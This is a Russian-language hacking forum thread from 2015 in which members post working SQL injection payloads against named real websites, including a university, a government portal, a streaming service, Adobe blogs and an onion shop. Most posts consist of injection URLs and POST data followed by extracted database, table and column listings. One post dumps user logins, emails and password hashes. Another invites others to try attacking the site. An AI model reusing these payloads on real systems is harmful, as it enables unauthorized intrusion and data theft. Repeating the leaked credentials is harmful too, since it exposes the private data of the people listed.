ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.06.2015, 15:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
Выжимал "максимум" с error based )) от потенциальной уязвимости до начала дампа за ~5 запросов))
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09NULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat%28version%28%29%29%29i%29a%29%29=2--%09
version() = 5.5.43-0+deb7u1
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Результат(имена таблиц в hoursppc_biznewenc):
Код:
Code:
addressbook
allorg_orders
best5
blog_commentmeta
blog_comments
blog_links
blog_options
blog_postmeta
blog_posts
blog_term_relationships
blog_term_taxonomy
blog_terms
blog_usermeta
blog_users
bonus_types
bonuses
categories
cats_of_groups
contacts_block
countries
coupons
currancies
domains
domains2
emails
fake_products
global
groups
images
langs
login
messages
news
old_orders
old_users
old_users2orders
order_discounts
order_items
order_statuses
orders
org_orders
pages
payments
pro_orders
products
real2fake
serialize_data
settings
shippings
single
states
storages
texts
ticket_action
ticket_notify
ticket_settings
ticket_ticket
ticket_ticket_bak
ticket_user
users
users2orders
users_anabol
warns
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Результат(имена колонок в hoursppc_biznewenc.users):
Код:
Code:
id
login
password
name
address
city
zip
country
state
email
phone
discount
added
lastvisit
status
canUpgrade
comments
is_active
md5Password
old_orders_count
old_orders_numbers
terms
active
history
refer
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,password))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Результат (обрывок от select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):
Код:
Code:
Neval;chuvyrlo@gmail.com;da3f50400551551ea03382ac7c3bfa587f789b68
tjoxvic;tjoxvic@gmail.com;da3f50400551551ea03382ac7c3bfa587f789b68
daniel middleton;daniel.middleton@afg.usmc.mil;da3f50400551551ea03382ac7c3bfa587f789b68
baddscorp;baddscorp@aol.com;da3f50400551551ea03382ac7c3bfa587f789b68
luga888;luga888@live.com;da3f50400551551ea03382ac7c3bfa587f789b68
mike6484;mike7542@comcast.net;da3f50400551
|
|
|
|
09.06.2015, 23:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Код:
Code:
http://forums.sbo.sailboatowners.com/q_login.php?do=login
POST
.SpoilerTarget" type="button">Spoiler: POST
redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(Extr actValue(1,concat(0x3a,(select+user()))))='1&vb_lo gin_password=asfasf&cookieuser=1&image.x=0&image.y =0&s=&do=login&vb_login_md5password=0a040ec34abbfb 7f3030345244a913c9&vb_login_md5password_utf=0a040e c34abbfb7f3030345244a913c9
Интегрированый вб в жумлу, везде попрятаны админки и т.п, но все ищется и льется . Мб кому интересно будет попробовать |
|
|
|
09.06.2015, 23:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Код:
Code:
https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a)+)+--+;
wp стоит |
|
|
|
11.06.2015, 20:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
8455
Репутация:
7
|
|
КАМЧАТСКИЙ НАУЧНЫЙ ЦЕНТР
Код:
Code:
http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19,20+--+
тиц 750 пр 5
5.5.30-log |
|
|
|
15.06.2015, 23:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
15245
Репутация:
11
|
|
SQLi:
Код:
Code:
http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3b3c62723e,database(),user(),version(),@@version_compile_os),7,8,9,10,11+--+
|
|
|
|
17.06.2015, 15:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Код:
Code:
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+
Версия: 5.0.96-community-log |
|
|
|
18.06.2015, 07:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
15245
Репутация:
11
|
|
SQLi:
Код:
Code:
http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,6,7,8,9,10,11+--+
rnd@localhost; 5.6.22; rnd |
|
|
|
19.06.2015, 11:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
Код:
Code:
http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT
alexa.cn трафф 590к
error-based
hostname: 'AY12063001214105c7538'
'root'@'127.0.0.1'
Nginx, PHP 5.4.37, MySQL >= 5.0.0
BD list:
alexa
icpdb
information_schema
mysql
performance_schema
test
tour2013
whoisdb
xj_cn_2014 |
|
|
|
22.06.2015, 10:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
Код:
Code:
http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450
leton.tv трафф 1.6kk сервис стримингово видео
error based
PHP 5.3.3, Nginx, MySQL >= 5.0.0
DBA: True
hostname: 'hostname.change.me'
''@'hostname.change.me'
''@'localhost'
'root'@'127.0.0.1'
'root'@'hostname.change.me'
'root'@'localhost'
DB list:
information_schema
megom
mysql
scorenews
test
wowza
wowza2
wowza2_b1 |
|
|
|
25.06.2015, 11:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
cashbackmonitor.comтрафф 430ксравнение шопов
Код:
Code:
Parameter: #1* (URI)
Код:
AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ
Title: Generic UNION query (NULL) - 22 columns
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] CashbackMonitor
[*] information_schema
[*] test
-------------------------------------------------------------
sydney.edu.au трафф 2.2kк
Код:
Code:
Type: error-based
Код:
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
available databases [266]:
Код:
[*] acaorn_wikidb[*] adri[*] anzacdb[*] appan[*] brainprofiling[*] cancer_sphider[*] cancerlearning[*] cancerlearning_tw[*] cards[*] cera[*] cl_resources[*] cl_surveys[*] cl_tw[*] clphpbb[*] ctc[*] ctctest[*] database[*] drh[*] elgg[*] emergency[*] eventsdb_dent[*] ex_allprofiles[*] ex_bdent[*] ex_bmri[*] ex_boh[*] ex_bond[*] ex_bond-post-upgrade[*] ex_bond_2005dev[*] ex_bond_after_upgrade[*] ex_bond_stage3-4[*] ex_bond_stage3_4[*] ex_bosch[*] ex_boschtest[*] ex_cirus[*] ex_cmsapitest[*] ex_cmsapitestreprox[*] ex_ctc[*] ex_dentistry[*] ex_devhealth[*] ex_global_health[*] ex_health[*] ex_kolling[*] ex_kollingfoundation[*] ex_medsci[*] ex_ncsc[*] ex_pharmacology[*] ex_pharmacy[*] ex_pharmold[*] ex_physiology[*] ex_proxyacaorn[*] ex_proxyaddiction[*] ex_proxyalumni[*] ex_proxyanatomy[*] ex_proxyapnet[*] ex_proxybmri[*] ex_proxybosch[*] ex_proxybsim[*] ex_proxycancerresearch[*] ex_proxycentral[*] ex_proxychw[*] ex_proxyconcord[*] ex_proxycoo[*] ex_proxycoppleson[*] ex_proxycpah[*] ex_proxydiabetes[*] ex_proxydrh[*] ex_proxyeye[*] ex_proxyfmrc[*] ex_proxyforensic[*] ex_proxygeneralpractice[*] ex_proxygenetic[*] ex_proxyglobalhealth[*] ex_proxyhealth[*] ex_proxyhocmai[*] ex_proxyimaging[*] ex_proxymeddiscipline[*] ex_proxymedfac[*] ex_proxymedfacfull[*] ex_proxymedfound[*] ex_proxymedicalfoundation[*] ex_proxymedicalhumanities[*] ex_proxymedsci[*] ex_proxymuseumtest[*] ex_proxynepean[*] ex_proxynmrf[*] ex_proxynorthern[*] ex_proxynrf[*] ex_proxyobsgynneo[*] ex_proxyome[*] ex_proxyopme[*] ex_proxypathology[*] ex_proxypharmacology[*] ex_proxyphysiology[*] ex_proxypmri[*] ex_proxypoche[*] ex_proxyprofiles[*] ex_proxyproteomics[*] ex_proxypsych[*] ex_proxyresearchteams[*] ex_proxyrural[*] ex_proxyseib[*] ex_proxystirc[*] ex_proxysurgery[*] ex_proxyvelim[*] ex_proxyvideoconf[*] ex_proxywestern[*] ex_proxywestmead[*] fhbc[*] ht_-v[*] ht_acaorn[*] ht_acaorntest[*] ht_addiction[*] ht_addictiontest[*] ht_agingbonetest[*] ht_anaes[*] ht_anatomytest[*] ht_apnet[*] ht_apnettest[*] ht_avit[*] ht_avittest[*] ht_bdent[*] ht_bmri[*] ht_bmritest[*] ht_bosch[*] ht_bosch_old[*] ht_bsim[*] ht_bsimtest[*] ht_cancerlearning[*] ht_cancerresearch[*] ht_cancerresearchtest[*] ht_central[*] ht_centraltest[*] ht_cochrane-renal[*] ht_concord[*] ht_concordtest[*] ht_cootest[*] ht_coppleson[*] ht_cpahtest[*] ht_ctc[*] ht_dentistry[*] ht_dentistrytest[*] ht_dermatology[*] ht_dermatologytest[*] ht_drh[*] ht_drhtest[*] ht_exambank[*] ht_forensic[*] ht_forensictest[*] ht_genetic[*] ht_genetictest[*] ht_globalhealthtest[*] ht_gmp[*] ht_gp[*] ht_gptest[*] ht_health[*] ht_healthbook[*] ht_healthbooktest[*] ht_healthtest[*] ht_hocmai[*] ht_hocmaitest[*] ht_imagingtest[*] ht_jira[*] ht_jmo[*] ht_kidsresearch[*] ht_kidsresearchtest[*] ht_kolling[*] ht_kollingtest[*] ht_localhost[*] ht_medfac[*] ht_medfactest[*] ht_medicalfoundation[*] ht_medicalfoundationtest[*] ht_medicalhumanities[*] ht_medicalhumanitiestest[*] ht_medicine[*] ht_medicinetest[*] ht_medsci[*] ht_medscitest[*] ht_mga[*] ht_mgatest[*] ht_nbrc[*] ht_nbrctest[*] ht_ncirs[*] ht_ncirstest[*] ht_ncsc[*] ht_nepean[*] ht_nepeantest[*] ht_neurologicalsigns[*] ht_northern[*] ht_northerntest[*] ht_nrf[*] ht_nrftest[*] ht_obsgynneo[*] ht_obsgynneotest[*] ht_ome[*] ht_ometest[*] ht_opme[*] ht_opmetest[*] ht_ovarian[*] ht_paediatrics[*] ht_paediatricstest[*] ht_pathologytest[*] ht_pharmacologytest[*] ht_physiology[*] ht_physiologytest[*] ht_poche[*] ht_pochetest[*] ht_psych[*] ht_psychtest[*] ht_pubhealth[*] ht_rural[*] ht_ruraltest[*] ht_scssc[*] ht_scssctest[*] ht_smokecheck[*] ht_smokechecktest[*] ht_stirc[*] ht_stirctest[*] ht_surgery[*] ht_surgerytest[*] ht_velim[*] ht_velimtest[*] ht_western[*] ht_westerntest[*] htcheck[*] infdisimmunologytest[*] information_schema[*] kolling[*] kollingaccess[*] kollinglive[*] limesurvey[*] limesurvey2[*] medicaldeanstestwp[*] medicaldeanswp[*] medsoc[*] moodle[*] moodle_cancer[*] mysql[*] nbcc[*] neurosigns[*] nmrf[*] orsee[*] pathologytest[*] pgau[*] phpesp[*] pmri[*] pmritest[*] proceduresmanual[*] publichealth[*] rehab[*] simrob_obs[*] ss[*] surgsoc[*] test[*] vmaillogin[*] wikibmri[*] wikicompass[*] wikidb[*] wikidevteam[*] wikifacmuseumtest[*] wikimedadminpedia[*] wikimediabank[*] wikiorrtmanual[*] wikioverseascahpedia[*] wpmysql
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
